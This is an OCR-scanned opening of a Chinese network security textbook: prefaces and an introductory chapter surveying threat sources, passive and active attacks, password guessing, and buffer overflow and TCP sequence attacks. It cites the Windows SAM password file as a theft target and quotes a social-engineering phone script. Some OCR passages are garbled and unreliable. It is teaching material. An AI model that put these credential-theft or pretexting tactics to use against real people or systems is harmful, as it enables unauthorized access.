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内 容 简 介 


网 络 安全 是 一 门 涉及 数字 通信 计算机 网 络 、 现 代 密码 学 等 领域 的 综合 性 技术 学 科 。 本 书面 向 应 用 型 
本 科 院 校 ,详细 阅 述 主要 网 络 安全 机 制 。 全 书 结构 合理 .层次 清晰 .概念 清楚 ,语言 精练 ,易于 教学 。 本 书 
按 网 络 攻 击 、 网 络 防御 两 大 部 分 组 织 编写 ,系统 介绍 了 TCP/IP 协议 族 安全 性 分 析 、 网 络 攻击 技术 防火 墙 
技术 、 入 侵 检 测 技 术 、 虚 拟 专 用 网 ,最 后 引入 网 络 安全 综合 实 训 。 

本 书 可 作为 信息 安全 、 网 络 工 程 . 软 件 工程 、 物 联网 工程 .计算 机 科学 与 技术 等 专业 的 本 科教 材 ,也 可 
作为 高 职高 专 学 生 或 工程 技术 人 员 的 参考 用 书 或 培训 教材 。 
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出 版 说 明 


由 于 网 络 应 用 越 来 越 普及 ,信息 化 的 社会 已 经 呈现 出 越 来 越 广阔 的 前 景 ,可 以 肯定 地 说 ， 
在 未 来 的 社会 中 电子 支付 ,电子 银行 ,电子 政务 以 及 多 方面 的 网 络 信息 服务 将 深入 到 人 
类 生活 的 方方面面 。 同 时 , 随 之 面临 的 信息 安全 问题 也 日 益 突出 ,非法 访问 、 信 息 窃 取 、 
甚至 信息 犯罪 等 恶意 行为 导致 信息 的 严重 不 安全 。 信 息 安全 问题 已 由 原来 的 军事 国防 
领域 扩展 到 了 整个 社会 ,因此 社会 各 界 对 信息 安全 人 才 有 强烈 的 需求 。 

信息 安全 本 科 专 业 是 2000 年 以 来 结合 我 国 特色 开设 的 新 的 本 科 专 业 , 是 计算 机 、 
通信 、 数 学 等 领域 的 交叉 学 科 , 主 要 研究 确保 信息 安全 的 科学 和 技术 。 自 专业 创办 以 
来 ,各 个 高 校 在 课程 设置 和 教材 研究 上 一 直 处 于 探索 阶段 。 但 各 高 校 由 于 本 身 专业 设 
置 上 来 自 于 不 同 的 学 科 , 如 计算 机 、 通 信和 数学 等 ,在 课程 设置 上 也 没有 统一 的 指导 规 
范 ,在 课程 内 容 、 深 浅 程度 和 课程 衔接 上 ,存在 模糊 不 清 、 内 容重 倒 、 知 识 覆 盖 不 全 面 等 
现象 。 因 此 ,根据 信息 安全 类 专业 知识 体系 所 覆盖 的 知识 点 ,系统 地 研究 目前 信息 安全 
专业 教学 所 涉及 的 核心 技术 的 原理 、 实 践 及 其 应 用 ,合理 规划 信息 安全 专业 的 核心 课 
程 ,在 此 基础 上 提出 适合 我 国信 息 安全 专业 教学 和 人 才 培 养 的 核心 课程 的 内 容 框架 和 
知识 体系 ,并 在 此 基础 上 设计 新 的 教学 模式 和 教学 方法 ,对 进一步 提高 国内 信息 安全 专 
业 的 教学 水 平和 质量 具有 重要 的 意义 。 

为 了 进一步 提高 国内 信息 安全 专业 课程 的 教学 水 平和 质量 ,培养 适应 社会 经 济 发 
展 需要 的 、 兼 具 研究 能 力 和 工程 能 力 的 高 质量 专业 技术 人 才 。 在 教育 部 相关 教学 指导 
委员 会 专家 的 指导 和 建议 下 ,清华 大 学 出 版 社 与 国内 多 所 重点 大 学 共同 对 我 国信 息 安 
全 人 才 培 养 的 课程 框架 和 知识 体系 ,以 及 实践 教学 内 容 进 行 了 深入 的 研究 ,并 在 该 基础 
上 形成 了 “信息 安全 人 才 需 求 与 专业 知识 体系 .课程 体系 的 研究 ”等 研究 报告 。 

本 系列 教材 是 在 课程 体系 的 研究 基础 上 总 结 、 完 善 而 成 ,力求 充分 体现 科学 性 、 先 
进 性 .工程 性 ,突出 专业 核心 课程 的 教材 ,兼顾 具有 专业 教学 特点 的 相关 基础 课程 教材 ， 
探索 具有 发 展 潜力 的 选修 课程 教材 ,满足 高 校 多 层次 教学 的 需要 。 

本 系列 教材 在 规划 过 程 中 体现 了 如 下 一 些 基本 组 织 原则 和 特点 。 

(1) 反映 信息 安全 学 科 的 发 展 和 专业 教育 的 改革 ,适应 社会 对 信息 安全 人 才 的 培 
养 需求 ,教材 内 容 坚 持 基 本 理论 的 扎实 和 清晰 ,反映 基本 理论 和 原理 的 综合 应 用 ,在 其 
基础 上 强调 工程 实践 环节 ,并 及 时 反映 教学 体系 的 调整 和 教学 内 容 的 更 新 。 

(2) 反映 教学 需要 ,促进 教学 发 展 。 教 材 要 适应 多 样 化 的 教学 需要 ,正确 把 握 教学 
内 容 和 课程 体系 的 改革 方向 ,在 选择 教材 内 容 和 编写 体系 时 注意 体现 素质 教育 .创新 能 
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力 与 实践 能 力 的 培养 ,为 学 生 知识 能力、 素质 协调 发 展 创造 条 件 。 

(3) 实施 精品 战略 ,突出 重点 。 规 划 教 材 建 设 把 重点 放 在 专业 核心 (基础 ) 课 程 的 教材 
建设 上 ; 特别 注意 选择 并 安排 一 部 分 原来 基础 比较 好 的 优秀 教材 或 讲义 修订 再 版 ,逐步 形 
成 精品 教材 ; 提倡 并 鼓励 编写 体现 工程 型 和 应 用 型 的 专业 教学 内 容 和 课程 体系 改革 成 果 的 
教材 。 

(4) 支持 一 纲 多 本 ,合理 配套 。 专 业 核心 课 和 相关 基础 课 的 教材 要 配套 ,同一 门 课程 可 
以 有 多 本 具有 各 自 内 容 特点 的 教材 。 处 理 好 教材 统一 性 与 多 样 化 ,基本 教材 与 辅助 教材 RA 
学 参考 书 ,文字 教材 与 软件 教材 的 关系 ,实现 教材 系列 资源 的 配套 。 

(5) 依靠 专家 ,择优 落实 。 在 制定 教材 规划 时 依靠 各 课程 专家 在 调查 研究 本 课程 教材 
建设 现状 的 基础 上 提出 规划 选 题 。 在 落实 主编 人 选 时 ,要 引入 竞争 机 制 , 通 过 申报 .评审 确 
定 主编 。 书 稿 完成 后 认真 实行 审 稿 程序 ,确保 出 书 质量 。 

繁荣 教材 出 版 事业 ,提高 教材 质量 的 关键 是 教师 。 建 立 一 支 高 水 平 的 、 以 老 带 新 的 教材 
编写 队伍 才能 保证 教材 的 编写 质量 ,希望 有志 于 教材 建设 的 教师 能 够 加 入 到 我 们 的 编写 队 
伍 中 来 。 
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第 2 版 前 言 


近年 来 , 随 着 无 线 网 络 向 能 终端 . 云 计算 等 新 兴 技术 的 快速 发 展 ,以 物 联网 .5G 网 络 、 
CPS 等 为 代表 的 下 一 代 网 络 正 处 于 逐步 部 署 和 实现 过 程 中 ,网 络 形态 逐步 呈现 出 了 层 
次 化 .虚拟 化 、 服 务 化 的 特点 。 在 下 一 代 网 络 中 ,网 络 安全 是 保障 整个 系统 正常 工作 , 提 
供 多 样 化 应 用 服务 的 基础 ,其 面临 着 来 自 不 同 层次 的 各 种 威胁 和 挑战 。 

本 书 主要 内 容 面 向 应 用 需求 ,简单 、 通 俗 .易学 ; 所 有 软件 实 训 方案 均 由 Windows 
Server 2008 真实 验证 ,硬件 实 训 方案 均 在 神州 数码 网 络 安全 设备 中 实现 。 本 书 主要 思 
路 ,以 人 类 认识 事物 的 基本 规律 为 出 发 点 , 即 由 简单 到 复杂 、 由 具体 到 抽象 .由 特殊 到 一 
般 , 以 实践 为 基础 ; 介绍 网 络 安全 的 基本 规律 , 即 网 络 安全 的 根源 是 人 为 地 利用 技术 漏 
洞 , 分 析 TCP/IP 协议 族 漏 洞 、 网 络 攻击 与 网 络 防御 的 关键 技术 。 

全 书 共 7 章 。 第 1 章 描述 网 络 安全 的 根源 、 含 义 ; 第 2 章 分 析 TCP/IP 协议 族 及 
其 安全 性 分 析 ; 第 3 章 介绍 网 络 攻击 技术 ; 第 4 一 第 6 章 详 细 描述 网 络 防御 关键 技术 ， 
第 7 章 引入 网 络 安全 项 目 综合 实践 。 本 书 内 容 编排 符合 认识 规律 ,逻辑 性 强 ,侧重 于 网 
络 攻击 与 网 络 防御 的 专业 技能 , 实 训 贯 穿 于 每 一 章 ,内容 讲解 清晰 透彻 ,对 重要 的 知识 
技能 引入 真实 案例 。 

本 书 读者 最 好 具有 信息 安全 的 数学 基础 与 现代 密码 学 的 基本 知识 。 笔 者 主编 的 
《信息 安全 基础 XX 清华 大 学 出 版 社 ) 是 本 书 的 姊妹 篇 ,主要 内 容 侧 重 于 信息 安全 数学 基 
础 、 现 代 密 码 学 信息 系统 安全 和 信息 内 容 安全 。 另 外 ,信息 安全 数学 基础 现代 密 码 
学 、 信 息 系统 安全 .软件 安全 与 网 络 安全 技术 相辅相成 ,读者 系统 学 习 这 些 课程 有 利于 
全 面 理解 掌握 信息 安全 、 网 络 安 全 的 基本 内 涵 。 

本 书 由 李 挫 保 主 编 ,第 2 和 第 3 章 由 李 挫 保 编写 ,第 4 一 第 6 章 由 任 必 军 编写 ,第 1 
和 第 7 章 由 范 乃 英 编写 。 建 议 总 学 时 数 为 64 学 时 ,其 中 实践 32 学 时 。 

对 于 网 络 实 训 设备 不 足 的 学 校 ,建议 采用 思科 模拟 器 Packet Tracer 5. 3 进行 实 
训 。 本 书 配 有 习题 .素材 和 实 训 ,相关 内 容 可 从 清华 大 学 出 版 社 网 站 下 载 ,对 本 书 的 建 
议 可 发 送 至 shbli@126. com, 

本 书 在 编写 过 程 中 得 到 了 清华 大 学 出 版 社 的 鼎力 支持 ,在 此 致 以 衷心 的 感谢 ! 限 
于 笔者 学 识 ,不足 之 处 ,恳请 同行 专家 批评 、 指 正 。 








编 者 
2017 年 10 月 


第 1 版 前 言 


D 1 世纪 是 信息 的 时 代 。 信息 成 为 一 种 重要 的 战略 资源 ,以 Internet 为 代表 的 计算 机 网 络 
正 引 起 社会 和 经 济 的 深刻 变革 , 极 大 地 改变 着 人 们 的 生活 和 工作 方式 ,Internet 已 经 成 
为 我 们 生活 和 工作 的 一 个 不 可 分 割 的 组 成 部 分 。 因 此 ,确保 计算 机 网 络 的 安全 已 经 成 
为 全 球 关注 的 社会 问题 和 通信 技术 领域 的 研究 热点 。 

本 书 融 入 了 作者 最 近 几 年 从 事 计算 机 网 络 与 信息 安全 教学 .科研 和 工程 经 验 的 积 
累 。 全 书 内 容 面 向 市 场 需求 ,简单 易学 ,全 面 专业 ,所 有 软件 实 训 方 案 均 在 Windows 
Server 2003 和 Red Hat Linux 9.0 真实 验证 ,所 有 硬件 实 训 方案 均 在 神州 数码 网 络 安 
全 设备 实现 。 

本 书 编写 的 方法 是 尊重 人 类 认识 事物 的 基本 规律 , 即 从 简单 到 复杂 、 从 具体 到 抽 
象 、 从 特殊 到 一 般 , 以 实践 为 基础 ; 认识 网 络 安全 的 基本 规律 ,网 络 安全 问题 的 根源 是 
人 为 地 利用 技术 漏洞 ,分 析 TCP/IP 的 漏洞 黑客 利用 漏洞 攻击 的 基本 手段 ,防御 攻击 
的 关键 技术 。 

本 书 共 9 章 , 第 1 章 介 绍 网 络 安全 的 根源 .意义 、 含 义 , 第 2 章 具 体 分 析 TCP/IP 的 
工作 过 程 , 第 3 章 阑 述 黑 客 攻击 的 主要 手段 ,第 4 一 第 9 章 详细 描述 防御 攻击 的 关键 技 
术 。 本 书 内 容 编 排 符 合 认识 规律 ,逻辑 性 强 ; 侧重 网 络 防御 实际 技能 的 培养 , 实 训 贯 穿 
每 一 章 , 内 容 讲 解 清晰 透彻 ,重要 的 知识 技能 引入 真实 的 商业 案例 。 

读者 最 好 具有 基本 的 密码 学 知识 ,作者 力荐 浙江 金融 职业 学 院 获 力 老师 主编 的 ( 密 
码 技术 与 应 用 (高 等 教育 出 版 社 ) 和 四 川 大 学 刘 嘉 勇 教授 主编 的 (应 用 密码 学 (清华 大 
学 出 版 社 )。 作 者 以 后 也 会 编写 一 本 面向 独立 学 院 、 高 职高 专 的 (现代 密码 技术 》( 清 华 
大 学 出 版 社 )。 

本 书 第 1 章 由 马 杰 编写 ,第 2 一 第 6 .第 8 和 第 9 章 由 李 扒 保 编写 ,第 7 章 由 何 汉 华 
编写 。 建 议 学 时 数 为 64 一 72。 对 于 网 络 实 训 设备 不 够 的 学 校 ,建议 采用 思科 模拟 器 
Packet Tracer 5. 3 进行 实 训 。 

本 书 配 有 习题 ,素材 和 实 训 , 相 关内 容 可 从 清华 大 学 出 版 社 网 站 下 载 ,对 本 书 的 建 
议 可 发 送 至 shbli@126. com, 

本 书 的 出 版 得 到 了 清华 大 学 出 版 社 的 易 力 支持 和 帮助 ,在 此 致 以 衷心 的 感谢 ! 

限于 笔者 学 识 , 不 足 之 处 ,县 请 同行 专家 批评 指正 。 


编 者 
2012 年 1 月 
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第 1 音 网络 安全 概述 


随 着 云 计 算 、 大 数据 、 物 联网 等 新 兴 技 术 的 迅猛 发 展 ,计算 机 网 络 存 在 的 安全 隐患 更 加 
严重 ,信息 安全 的 重要 性 日 益 突出 ,给 网 络 安全 保障 带 来 极为 严峻 的 挑战 。“ 没 有 网 络 安全 
就 没有 国家 安全 ,没有 信息 化 就 没有 现代 化 "已 上 升 为 国家 战略 。 因 此 ,网 络 信息 安全 已 经 
成 为 全 球 关注 的 研究 热点 。 


1.1 网 络 空间 面临 的 安全 威胁 


2014 年 1 月 21 日 15 时 ,国内 通用 项 级 域 的 根 服 务 器 出 现 异 常 , 导 致 众多 知名 网 站 出 
H DNS 解析 故障 ,有 2/3 网 站 无 法 访问 。 面 对 层出不穷 的 各 种 威胁 ,要 做 到 事前 主动 防御 
事 中 灵活 控制 ,事后 分 析 跟 踪 。 威 胁 的 根源 在 于 4 个 方面 , 即 物理 因素 ,协议 与 系统 漏洞 .网 
络 结构 缺陷 和 人 为 因素 。 

1. 物理 因素 

物理 因素 是 指 地 震 、 洪 水 、 火 灾 等 人 类 不 可 抗拒 力量 对 计算 机 网 络 通信 设施 的 破坏 ,以 
及 电气 设备 老化 .电磁 泄漏 .存储 介质 破损 .静电 效应 和 电焊 火花 导致 短路 等 对 计算 机 系统 
的 破坏 。 

2. 协议 与 系统 漏洞 

TCP/IP 协议 族 使 不 同 的 硬件 设备 .操作 系统 及 其 应 用 互联 互通 。 在 TCP/IP 模型 中 ， 
网 络 接口 层 由 网 卡 实现 ,功能 是 接 人 局域网 ; 网 络 层 由 路 由 器 实现 ,功能 是 在 两 个 网 络 之 间 
进行 寻 址 和 路 由 ; 传输 层 由 主机 中 系统 的 应 用 进程 实现 ,功能 是 在 两 个 主机 的 应 用 进程 之 
间 进行 通信 ; 应 用 层 提供 网 络 应 用 服务 。 

协议 与 系统 漏洞 是 指 TCP/IP 协议 .TCP/IP 服务 以 及 操作 系统 漏洞 。TCP/IP 协议 先 
天 没有 设计 安全 机 制 , 易 被 入 侵 者 利用 ,以 达到 删除 、 修 改 、 窃 取 敏感 信息 的 目的 。TCP/IP 
协议 漏洞 是 网 络 接口 层 、 网 络 层 、 传 输 层 和 应 用 层 协 议 的 漏洞 ,如 ARP 欺骗 .IP 欺骗 .路 由 
选择 欺骗 、TCP 序列 号 欺骗 .TCP 序列 号 洪 泛 攻击 等 。TCP/IP 服务 漏洞 是 应 用 层 实 现 网 
络 服务 的 漏洞 ,如 Web 服务 FTP 服务 .DHCP 服务 、 路 由 和 远程 访问 服务 以 及 电子 邮件 服 
务 等 服务 的 漏洞 。Windows 等 多 种 网 络 操作 系统 存在 诸多 安全 隐患 ,如 CGI ActiveX, Java 
Script, VB Seript、 缓 冲 区 溢出 攻击 及 系统 后 门 , 称 为 系统 漏洞 。 

漏洞 主要 存在 于 操作 系统 、 网 络 服 务 程序 、 应 用 软件 及 脚本 中 , 它 使 得 黑客 能 够 执行 特 
殊 的 操作 ,从 而 获得 不 应 有 的 权限 。 几 乎 每 天 都 能 在 某 些 程序 或 操作 系统 中 发 现 新 的 漏洞 ， 
许多 漏洞 导致 攻击 者 获得 root 权限 ,从 而 使 攻击 者 可 以 控制 系统 并 且 获 得 机 密 资料 ,导致 
公司 或 者 个 人 遭受 巨大 损失 。 
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3. 网 络 结构 缺陷 

(1) 网 络 拓扑 结构 的 安全 缺陷 。 拓 扑 结构 决定 了 网 络 的 布局 .连接 方式 ,同时 在 很 大 程 
度 上 决定 了 与 之 匹配 的 访问 控制 和 信息 传输 方式 ; 有 些 拓扑 结构 具有 先天 性 的 不 安全 性 和 
不 可 靠 性 ,如 总 线 型 拓扑 , 它 通常 采用 广播 方式 通信 ,一 个 节点 发 送 的 信息 ,网 络 上 的 每 个 节 
点 都 可 以 收 到 ,导致 信息 的 不 安全 性 。 

(2) 网 络 设备 的 安全 缺陷 。 路 由 器 是 实现 广域网 互联 的 关键 设备 ,可 执行 路 由 选择 、 拥 
塞 控制 . 计 费 等 一 系列 复杂 的 操作 ,现在 的 路 由 器 都 附加 了 防火 墙 功 能 。 一 方面 ,路 由 器 本 
身 存 在 漏洞 ; 另 一 方面 ,路 由 器 也 经 常 受到 攻击 。 因 此 ,路 由 器 也 是 网 络 上 的 一 个 安全 隐患 。 

4. 人 为 因素 

由 于 Internet 开放 性 .共享 性 以 及 新 服务 的 运用 ,网 上 资源 应 有 尽 有 ,网 民 在 享受 到 
Internet 带 来 无 穷 乐趣 的 同时 ,一 些 别 有 用 心 的 人 通过 Internet 通道 做 起 了 非法 勾当 。 于 
是 ,病毒 .蠕虫 .木马 等 基于 网 络 和 系统 漏洞 的 攻击 事件 越 来 越 多 ,对 人 们 的 心理 造成 严重 
伤害 。 





1.2 常见 的 网 络 攻击 


1. 网 络 攻击 的 分 类 

从 攻击 方式 的 角度 ,网 络 攻击 可 以 分 为 被 动 攻击 和 主动 攻击 两 种 类 型 。 被 动 攻击 试图 
获得 或 利用 系统 的 消息 ,但 并 不 会 破坏 系统 资源 。 主 动 攻击 试图 破坏 系统 资源 ,并 影响 系统 
的 正常 工作 。 

1) 被 动 攻击 

被 动 攻击 的 特性 是 对 所 传输 的 信息 进行 窃听 和 监测 。 攻 击 者 的 主要 目标 是 获得 通信 线 
路 上 所 传输 的 信息 。 被 动 攻击 主要 是 收集 信息 ,并 不 涉及 对 数据 的 更 改 ,所 以 很 难 被 用 户 发 
现 ,因此 预防 很 重要 。 防 止 被 动 攻击 的 主要 手段 是 数据 加 密 传输 。 信 息 汇 露 和 流量 分 析 是 
两 种 典型 实例 。 

CD 信息 泄露 。 电 子 邮 件 和 传输 的 文件 中 都 可 能 含有 敏感 信息 ,要 阻止 攻击 者 获得 这 
些 信 息 。 

(2) 流量 分 析 。 假 设 数据 加 密 隐 藏 了 消息 的 内 容 或 信息 的 流量 ,攻击 者 即使 捕获 了 消 
息 也 无 法 获得 有 价值 的 信息 。 但 是 ,攻击 者 可 以 通过 流量 分 析 获 得 这 些 消 息 的 模式 ,确定 通 
言 主机 的 身份 和 所 处 的 位 置 ,观察 传输 消息 的 频率 和 长 度 ,根据 这 些 信息 可 以 推断 出 本 次 通 
信 的 性 质 。 

2) 主动 攻击 
主动 攻击 包括 对 数据 流 进行 自 改 或 伪造 数据 流 , 可 以 分 为 以 下 四 类 。 

CD 伪装 攻击 。 某 个 实体 A 假装 成 实体 B, 对 目标 系统 发 起 攻击 ; 伪装 攻击 的 例子 是 
攻击 者 A 捕获 B 的 认证 信息 ,然后 将 认证 信息 重 发 ,这样 A 可 能 获得 B 所 拥有 的 权限 。 

(2) 重 发 攻击 。 攻 击 者 为 了 达到 某 种 目的 ,将 获得 的 信息 再 次 发 送 ,在 非 授权 的 情况 下 
进行 传输 。 
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(3) HEA. oou ARA A A rh Ay — B4) E IT EE Dl. si ER TH B D Pe i > 
以 达到 其 非 授 权 的 目的 。 例 如 ,攻击 者 将 消息 “allow John Smith to read confidential 
accounts” 修 改 为 "allow Fred Brown to read confidential accounts”, 

(4) 拒绝 服务 攻击 。 为 了 阻止 或 禁止 人 们 正常 地 使 用 网 络 服务 或 通信 设备 ,如 攻击 者 
伪造 无 效 IP 地 址 连接 服务 器 S, 使 得 接收 错误 IP 地 址 的 S 浪费 时 间 连 接 该 非法 IP 地 址 。 

与 被 动 攻击 相反 ,主动 攻击 容易 检测 到 , 却 难以 阻止 这 些 攻击 ,所 以 对 付 主动 攻击 的 


pae 


重 
点 应 当 放 在 如 何 检测 并 发 现 攻击 ,并 采取 相应 的 应 急 响应 措施 ,从 故障 状态 中 恢复 系统 正常 
z 至 
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图 1-1 消息 泄露 
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图 1-2 流量 分 析 
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图 1-3 伪装 
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2. 网 络 攻 击 的 手段 
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图 1-4 重 放 
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图 1-5 消息 算 改 
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图 1-6 拒绝 服务 


前 面 介 绍 了 网 络 中 存在 的 各 种 威胁 ,这 些 威胁 直接 表现 形式 是 黑客 采取 的 各 种 网 络 攻 


击 方式 ,有 以 下 几 种 。 

(OD 口令 窃取 。 
统 入 侵 是 由 于 口令 系统 失效 造成 的 ， 
作为 登录 口令 。 














进入 一 台 计 算 机 最 容易 的 办 法 是 窃取 用 户 的 口令 进入 系统 。 大 部 分 系 


令 失效 的 普遍 原因 是 人 们 习惯 于 选择 很 简单 的 口令 


口令 猜测 攻击 有 以 下 3 种 基本 方式 。 











© fl 








已 知 的 或 假定 的 口令 尝试 登录 ,这 种 尝试 反复 进行 几 十 次 ,往往 会 取得 成 功 , 一 
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O 根据 窃取 的 口令 文件 进行 猜测 (如 Windows 系统 中 的 windows\system32\config\ 
sam 文件 ),sam 从 已 经 被 攻破 的 系统 中 窃取 ,或 者 从 未 攻破 的 系统 中 获得 ,由 于 用 户 习 惯 重 
复 使 用 同一 口令 ,黑客 尝试 用 其 登录 其 他 机 器 ,这 种 攻击 称 为 字典 攻击 。 

O 黑客 窃听 某 次 合法 终端 之 间 的 会 话 , 记 录 所 使 用 的 口令 。 

(2) 欺骗 攻击 。 黑 客 另 一 种 攻击 方式 是 采用 欺骗 方式 获取 登录 权限 。 泄 密 通 常 发 生 在 
打 电 话 或 聊天 的 过 程 中 。 


“This is Thompson. Someone called me about a problem with the /s command. 





He'd like me to fix it. " 

*Oh.OK. What should I do?" 

*Just change the password on my login on your machine; it's been a while since I've 
used it, " 

“No Problem. " 

从 上 面 的 谈话 可 以 听 出 ,Thompson 欺骗 网 络 管理 员 改 变 口令 ,使 他 成 功 登录 到 其 计算 
机 上 。 

(3) 缺陷 和 后 门 攻 击 。 网 络 蠕虫 传播 的 方式 之 一 是 通过 向 Finger 后 台 程序 (Daemon) 
发 送 新 的 代码 来 实现 的 。 该 后 台 程 序 不 希望 收 到 这 些 代 码 ,但 在 协议 中 没有 限制 接收 这 些 
代码 的 机 制 ; 后 台 程序 发 出 一 个 Gets 呼叫 ,但 没有 指定 最 大 的 缓冲 区 长 度 ; 蠕虫 向 * 读 ?组 
冲 区 注入 大 量 的 数据 ,直到 将 Gets 堆栈 中 的 返回 地 址 覆盖 ,后 台中 子 程序 返回 时 转 而 执行 
人 侵 者 的 代码 。 

缓冲 区 溢出 攻击 也 称 为 堆栈 粉碎 攻击 ,这 是 攻击 者 常 采 用 的 一 种 扰乱 程序 的 攻击 方法 。 
人 们 通过 改进 设计 来 消除 缓冲 器 溢出 缺陷 ,有 些 计 算 机 语言 在 设计 时 , 尽 可 能 不 让 攻击 者 做 
到 这 点 ; 一 些 硬 件 系统 尽量 不 在 堆栈 系统 上 执行 代码 ,一些 C 语 言 编译 器 和 库 函 数 也 使 
用 了 对 付 缓冲 器 溢出 攻击 的 方法 。 缺 陷 是 指 程序 中 的 某 些 代码 不 能 满足 特定 的 要 求 , 尽 
管 一 些 程序 缺陷 已 经 由 厂家 解决 ,但 是 问题 依然 存在 ; 关键 问题 是 在 编写 软件 时 力求 做 
到 准确 无 误 ; 软件 上 的 缺陷 是 很 难 避 免 的 ,这 就 是 今天 软件 中 为 什么 存在 那么 多 缺陷 的 
原因 。 

CD 协议 缺陷 。 上 述 讨论 是 基于 系统 正常 工作 的 情况 下 发 生 的 攻击 。 但 是 ,有 些 认证 
协议 本 身 就 有 安全 缺陷 ,从 而 导致 攻击 。 

一 个 例子 是 对 TCP 发 起 的 序列 号 攻击 ,由 于 在 建立 连接 时 所 生成 的 初始 序列 号 的 随机 
性 不 够 ,攻击 者 很 可 能 发 起 源 地 址 欺骗 攻击 ; 为 了 做 到 公平 ,TCP 的 序列 号 在 设计 时 没有 
考虑 抵御 恶意 攻击 。 其 他 基于 序列 号 认证 的 协议 也 可 能 遭受 同样 的 攻击 ,如 DNS 和 基于 
RPC 的 协议 。 

C» 拒绝 服务 攻击 。 前 面 讨论 的 攻击 方式 ,大 多 数 是 基于 协议 的 弱点 、 服 务 器 软件 的 缺 
陷 和 人 为 因素 而 实施 的 。 拒 绝 服务 攻击 则 不 同 , 其 仅仅 是 过 度 使 用 服务 ,使 软件 或 硬件 过 度 
运行 网 络 连接 超出 容量 ,目的 是 造成 系统 瘫痪 或 降低 服务 质量 。 这 种 攻击 不 会 造成 文件 删 
除 或 数据 丢失 ,往往 比较 容易 被 发 现 ( 如 关闭 一 个 服务 很 容易 被 检测 到 ) ,但 是 找到 攻击 源头 
却 十 分 困难 。 
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1.3 ”网 络 安全 的 含义 


计算 机 网 络 是 以 能 够 相互 共享 资源 的 方式 互联 起 来 的 自治 计算 机 系统 的 集合 。 计 算 机 
网 络 建立 的 主要 目的 是 实现 计算 机 资源 的 相互 共享 ; 互联 的 计算 机 是 分 布 在 不 同 地 理 位 置 
的 多 台独 立 的 自治 计算 机 ,互联 的 计算 机 之 间 没 有 明确 的 主 从 关系 ,每 台 计 算 机 既 可 以 联网 
工作, 也 可 以 脱 网 独立 工作 ; 联网 计算 机 之 间 的 通信 必须 遵循 共同 的 网 络 协议 。 为 了 保证 
计算 机 网 络 安全 ,需要 自主 计算 机 的 安全 和 互联 的 安全 , 即 用 以 实现 互联 的 通信 设备 .通信 
链 路 .网络 软 件 、 网 络 协议 的 安全 ; 需要 各 种 网 络 应 用 和 服务 的 安全 。 为 了 全 面 地 理解 计算 
机 网 络 安全 的 内 涵 ,首先 需要 了 解 信 息 安全 的 发 展 历程 。 


1.3.1 信息 安全 的 发 展 历程 


信息 安全 的 发 展 跟 信息 技术 的 发 展 和 用 户 的 需求 密 不 可 分 。 目 前 ,信息 安全 领域 的 主 
流 观点 : 信息 安全 的 发 展 大 致 分 为 通信 安全 、 信 息 安全 和 信息 保障 3 个 阶段 , 即 保密 、 保 护 
和 保障 发 展 阶段 。 

1. 通信 安全 

早期 ,所 有 资产 是 物理 的 ,重要 信息 是 物理 的 ,如 古代 刻 在 骨头 上 即 甲骨 文 , 到 后 来 写 在 
纸 上 ; 信息 传递 由 信使 完成 ,如 果 信 使 被 敌人 武力 劫持 , 报 文 信息 就 会 被 敌人 知悉 ,因此 就 
产生 了 通信 安全 的 问题 ,可 见 物 理 安全 是 存在 缺陷 的 。 第 二 次 世界 大 战 期 间 , 德 国人 发 明了 
一 种 称 为 Enigma 的 机 器 来 加 密 报 文 ( 图 1-7) ,用 于 军队 情报 加 密 , 当 时 他 们 认为 Enigma 是 
不 可 破译 的 。 确 实 是 这 样 , 如 果 使 用 恰当 ,要 破译 它 非 常 困难 。 但 经 过 一 段 时 间 发 现 , 由 于 


某 些 操作 员 使 用 差错 ,Enigma 被 破译 了 。 


ETHE 
加 密 信号 和 原始 的 未 加 
密 信号 都 在 电话 线 上 











1-7 Enigma 加 密 报 文 


从 以 上 事例 可 知 ,通信 安全 的 主要 目的 是 解决 数据 传输 的 安全 问题 ,主要 措施 是 口令 
技术 。 

2. 信息 安全 

20 世纪 90 年 代 以 后 ,半导体 和 集成 电路 技术 的 飞速 发 展 推动 了 计算 机 软件 、 硬 件 的 发 
展 , 计 算 机 和 网 络 技术 的 应 用 进入 了 实用 化 和 规模 化 阶段 ,人 们 对 安全 的 关注 已 经 逐渐 扩展 
为 以 机 密 性 ,完整 性 和 可 用 性 为 目标 的 信息 安全 阶段 ,具有 代表 性 的 成 果 是 美国 的 TCSEC 
和 欧洲 的 ITSEC 测评 标准 。 同 时 出 现 了 防火 墙 . 入 侵 检 测 系统 、 漏 洞 扫描 及 虚拟 专用 网 等 
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网 络 安全 技术 ,这 一 阶段 的 信息 安全 可 以 归纳 为 对 信息 系统 的 保护 ,主要 保证 信息 的 机 密 
性 、 完 整 性 、 可 用 性 、 可 控 性 和 不 可 否认 性 。 

美国 可 信 计 算 机 系统 评价 标准 (Trusted Computer System Evaluation Criteria, TCSEC) , 即 
桂皮 书 。TCSEC 共 分 为 四 类 七 级 : D 为 无 保护 级 ,C 为 自主 保护 级 ,B 为 强制 保护 级 ,A 为 
验证 保护 级 。 桔 皮 书 对 每 一 级 定义 了 功能 要 求 和 保证 要 求 , 也 就 是 说 要 符合 某 一 安全 级 要 
求 ,必须 既 满足 功能 要 求 也 满足 保证 要 求 。 为 了 使 计算 机 系统 达到 安全 要 求 ,计算 机 厂商 花 
费 很 长 时 间 和 很 多 资金 ; 有 时 当 产 品 通 过 级 别论 证 时 ,该 产品 已 经 过 时 了 ; 当 老 的 系统 取 
得 安全 认证 之 前 新 版 操作 系统 和 硬件 出 现 了 。 

信息 安全 解决 计算 机 信息 载体 及 其 运行 的 安全 问题 ,措施 是 正确 实施 主体 对 客体 的 访 
问 控制 。 

3. 信息 保障 

20 世纪 90 年 代 后 期 ,美国 国防 部 提出 了 信息 保障 的 概念 ,标志 着 信息 安全 进入 了 一 个 
全 新 的 发 展 阶段 。 随 着 互联 网 的 飞速 发 展 ,信息 安全 不 再 局 限于 对 信息 的 静态 保护 ,而 需要 
对 整个 信息 和 信息 系统 进行 保护 和 防御 。 信 息 保障 主要 包括 保护 (Protect) 、 检 测 (Detect) 、 
响应 (React) 和 恢复 (Restore)4 个 方面 ,其 目的 是 动态 ,全 方位 地 保护 信息 系统 。 

进入 21 世纪 ,信息 安全 的 主要 标志 是 “信息 保障 技术 框架 "建立 。 信 息 保 障 三 大 要 素 是 
人 技术 和 管理 。 人 是 信息 保障 的 基础 ,信息 系统 是 人 建立 的 ,同时 也 是 为 人 民 服 务 的 , 受 人 
的 行为 影响 。 因 此 ,信息 保障 依靠 专业 知识 强 、 安 全 意识 高 的 专业 人 员 。 技 术 是 信息 保障 的 
